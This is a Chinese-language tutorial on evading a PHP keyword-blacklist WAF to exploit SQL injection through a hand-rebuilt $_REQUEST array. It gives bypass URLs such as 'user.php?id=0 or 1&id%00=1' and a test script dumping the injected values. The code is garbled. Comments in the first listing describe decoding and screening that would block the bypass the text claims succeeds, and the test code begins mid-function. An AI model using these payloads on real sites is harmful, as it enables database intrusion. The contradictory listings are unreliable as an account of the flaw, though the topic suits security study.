关于注入的waf绕过,注入点为:
$sql="select * from user where id=".$_REQUEST["id"].";";
可以看到 id 是通过 $_REQUEST 传递的,并且存在如下的 waf 代码:
/**
 * Keyword blacklist applied to a single request value.
 *
 * Scans $str case-insensitively for each blocked word and terminates the
 * request with a fixed message on the first hit; returns nothing otherwise.
 * The original listing elides the rest of the keyword list ("......").
 */
function waf($str)
{
    $blocked = [
        "select",
        "union",
        // ...... remaining keywords elided in the original listing
    ];
    foreach ($blocked as $word) {
        if (stripos($str, $word) !== false) {
            die("Be a good person!");
        }
    }
}
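/**
 * Runs waf() over every key and value of an input array.
 *
 * Array-valued parameters (PHP builds nested arrays for bracketed names) are
 * descended into instead of being handed to waf(): stripos() on an array is a
 * TypeError in PHP 8, so without the recursion such a request would crash
 * rather than be inspected.
 */
function wafArr($arr)
{
    foreach ($arr as $k => $v) {
        waf($k);
        if (is_array($v)) {
            wafArr($v);
        } else {
            waf($v);
        }
    }
}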
// Screen the standard input arrays before anything else runs. Note what is
// not in this list: $_REQUEST (rebuilt by hand further down) and $_SERVER.
// $_SESSION is only populated once session_start() has been called.
foreach ([$_GET, $_POST, $_COOKIE, $_SESSION] as $input) {
    wafArr($input);
}
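/**
 * HTML-escapes a single input string (then addslashes() the result).
 *
 * get_magic_quotes_gpc() always returns false since PHP 7.4 and was removed
 * in PHP 8, where calling it is a fatal "undefined function" error; it is
 * guarded with function_exists() so the file still loads on current PHP.
 *
 * Because quotes are converted to entities first, addslashes() afterwards only
 * ever escapes backslashes and NUL bytes — the output is HTML escaping, not an
 * SQL-safe value. The query on the page concatenates $_REQUEST["id"] directly,
 * which this function does not make safe; a prepared statement does.
 */
function stripStr($str)
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $str = stripslashes($str);
    }
    return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
}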
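// Rebuild $_REQUEST by hand from the raw query string. PHP has already parsed
// the same query string into $_GET, which wafArr() screened above, but the
// original loop stored keys and values exactly as they appear in the URL
// (still percent-encoded) and never passed them through waf(), so $_REQUEST
// could hold text that $_GET could not. Decode each pair the way PHP does for
// $_GET, screen it, and only then store it. explode() is limited to two parts
// so a value containing '=' is kept whole instead of truncated.
// This keeps the filter consistent; it does not make the concatenated SQL on
// the page safe — only a parameterised query does that.
$uri = explode("?", $_SERVER['REQUEST_URI'] ?? '');
if (isset($uri[1])) {
    $parameter = explode("&", $uri[1]);
    foreach ($parameter as $k => $v) {
        $v1 = explode("=", $v, 2);
        if (isset($v1[1])) {
            $name = urldecode($v1[0]);
            $value = urldecode($v1[1]);
            waf($name);
            waf($value);
            $_REQUEST[$name] = stripStr($value);
        }
    }
}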
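/**
 * Returns a copy of $arr with every key and value passed through stripStr().
 *
 * Array-valued entries are recursed into: stripStr() calls htmlspecialchars(),
 * which rejects an array (TypeError in PHP 8), so without the recursion any
 * nested parameter would abort the request instead of being escaped.
 * Integer keys become strings inside stripStr() and are coerced back to
 * integers by PHP when used as array keys, so numeric keys are preserved.
 */
function stripArr($arr)
{
    $new_arr = [];
    foreach ($arr as $k => $v) {
        $new_arr[stripStr($k)] = is_array($v) ? stripArr($v) : stripStr($v);
    }
    return $new_arr;
}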
// Replace the standard input arrays with their escaped copies. This runs after
// the wafArr() calls, so waf() inspected the unescaped text. $_REQUEST, which
// was rebuilt by hand above, is not re-escaped here.
$_GET     = stripArr($_GET);
$_POST    = stripArr($_POST);
$_COOKIE  = stripArr($_COOKIE);
$_SESSION = stripArr($_SESSION);
user.php?id=0 or 1&id%00=1
user.php?id=0 or 1&%20id=1
user.php?id=0 or 1?&id=1
测试代码:
$v) {
$new_arr[stripStr($k)] = stripStr($v);
}
return $new_arr;
}
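/**
 * HTML-escapes a single input string (then addslashes() the result).
 *
 * get_magic_quotes_gpc() always returns false since PHP 7.4 and was removed
 * in PHP 8, where calling it is a fatal "undefined function" error; it is
 * guarded with function_exists() so the test script still runs on current PHP.
 *
 * Quotes are converted to entities before addslashes() runs, so addslashes()
 * only ever escapes backslashes and NUL bytes.
 */
function stripStr($str)
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $str = stripslashes($str);
    }
    return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
}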
// Hand-rolled query-string parser that writes into $_REQUEST. Keys and values
// are taken verbatim from REQUEST_URI — still percent-encoded — which is why
// the dump below shows '0%20or%201' and a literal 'id%00' key. Nothing here
// calls a WAF function: this listing shows what lands in $_REQUEST, not a
// filtered version of it.
$uri = explode("?", $_SERVER['REQUEST_URI']);
if (isset($uri[1])) {
    foreach (explode("&", $uri[1]) as $pair) {
        $parts = explode("=", $pair);
        if (!isset($parts[1])) {
            continue;
        }
        $_REQUEST[$parts[0]] = stripStr($parts[1]);
    }
}
// Dump PHP's own parse of the query string next to the hand-built $_REQUEST
// so the two can be compared.
var_dump($_GET, $_REQUEST);
?>
输出结果:
'id' => '0%20or%201' (length=10), 'id%00' => '1' (length=1)。可以看到,注入内容已成功被引入到 $_REQUEST 数组中。